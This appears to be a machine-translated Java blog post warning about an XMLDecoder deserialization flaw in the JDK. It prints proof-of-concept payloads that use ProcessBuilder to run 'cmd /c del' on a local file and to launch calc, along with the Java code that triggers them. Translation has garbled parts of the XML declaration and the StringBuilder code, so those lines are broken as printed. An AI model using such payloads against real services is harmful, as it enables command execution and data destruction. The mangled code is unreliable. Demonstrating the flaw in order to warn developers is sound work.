Yesterday in the company found a JDK XMLDecoder deserialization vulnerability, looks very dangerous! Here are two examples to see what this vulnerability can do!

Example 1: Delete a local file with XmlDecoder

First look at the contents of the xmldecoder.xml file:

<? The XML version = "1.0" encoding = "utf-8"? > < Java version="1.8.0_151" class=" java.beans.xmldecoder "> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="4"> <void index="0"> <string>cmd</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>del</string> </void> <void index="3"> <string>e:\1.txt</string> </void> </array> <void method="start" /> </object> </java>Copy the code

Let’s look at some sample code for parsing this XML file with XMLDecoder:

private static void byXmlFile() {
    File file = new File("E:\\xmldecoder.xml");
    XMLDecoder xd = null;
    try {
        xd = new XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
    } catch (Exception e) {
        e.printStackTrace();
    }
    Object s2 = xd.readObject();
    xd.close();
}
Copy the code

CMD /c del e:\1.txt delete the local file: e:\1.txt

Example 2: Invoking a native program with XmlDecoder

private static void byXmlString() { String xml = new StringBuilder().append("<? The XML version = \ \ "1.0" encoding = \ "utf-8 \"? > "), append (" < Java version = \ "1.8.0 comes with _151 \" class = \ "Java. Beans. XMLDecoder \" > "), append (" < object class=\"java.lang.ProcessBuilder\">") .append(" <array class=\"java.lang.String\" length=\"1\">") .append(" <void index=\"0\">") .append(" <string>calc</string>") .append(" </void>") .append(" </array>") .append(" <void method=\"start\" />") .append(" </object>") .append("</java>").toString(); XMLDecoder xd = null; try { xd = new XMLDecoder(new ByteArrayInputStream(xml.getBytes())); } catch (Exception e) { e.printStackTrace(); } Object s2 = xd.readObject(); xd.close(); }Copy the code

This code is changed to a String input source, which doesn’t matter, but it uses the XmlDecoder class in the JDK to parse the XML String. After this code is executed, the local calculator program is called.

The processBuilder.start () method, like the runtime.exec () method, can be used to create an operating system process that can be used to control the process state and obtain relevant information.

The constructor of the ProcessBuilder accepts a list of commands.

public ProcessBuilder(List<String> command) {
    if (command == null)
        throw new NullPointerException();
    this.command = command;
}
Copy the code

conclusion

XmlDecoder deserialization in Jdk has security vulnerability, can call the local application, can also execute the command supported by the system, once the hacker organized into a command list attack system, the consequences are unimaginable!

I’ve only used the ProcessBuilder class to demonstrate two cases of calling system programs, but there are more than just this attack. This vulnerability still exists in jdK8_0_151.

It is recommended not to use the XmlDeocder class in the JDK and to look for other, more secure, XML parsing utility classes.

Seek forward, urgent diffusion, avoid greater loss! ~

Recommended reading

Dry goods: Free 2TB architect four-stage video tutorial

Interview: the most complete Java multithreaded interview questions and answers

Tools: Recommended an online creation flow chart, mind mapping software

Share Java dry goods, high concurrency programming, hot technology tutorials, microservices and distributed technology, architecture design, blockchain technology, artificial intelligence, big data, Java interview questions, and cutting-edge hot news.